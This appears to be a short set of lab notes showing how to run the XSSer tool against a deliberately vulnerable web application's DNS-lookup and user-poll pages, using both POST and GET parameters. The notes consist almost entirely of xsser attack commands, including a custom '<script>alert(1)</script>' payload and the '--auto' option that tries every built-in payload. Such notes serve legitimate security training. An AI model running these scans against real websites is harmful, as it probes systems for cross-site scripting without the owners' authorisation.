POST Request

  1. Basic Attack

    xsser --url 'http://192.94.37.3/index.php?page=dns-lookup.php' -p 'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS'
    

    <aside> 💡 We cannot use the above payload, because it is not a legitimate payload.

    </aside>

  2. Using our own custom XSS payload.

    xsser --url 'http://192.94.37.3/index.php?page=dns-lookup.php' -p 'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS' --Fp "<script>alert(1)</script>"
    
  3. Trying various or all XSS payloads provided by XSSer's "--auto" option

    xsser --url 'http://192.94.37.3/index.php?page=dns-lookup.php' -p 'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS' --auto
    

GET Request

  1. Basic Attack

    xsser --url "http://192.94.37.3/index.php?page=user-poll.php&csrf-token=&choice=XSS&initials=jd&user-poll-php-submit-button=Submit+Vote"
    
  2. Using our own custom XSS payload.

    xsser --url "http://192.94.37.3/index.php?page=user-poll.php&csrf-token=&choice=XSS&initials=jd&user-poll-php-submit-button=Submit+Vote" --Fp "<script>alert(1)</script>"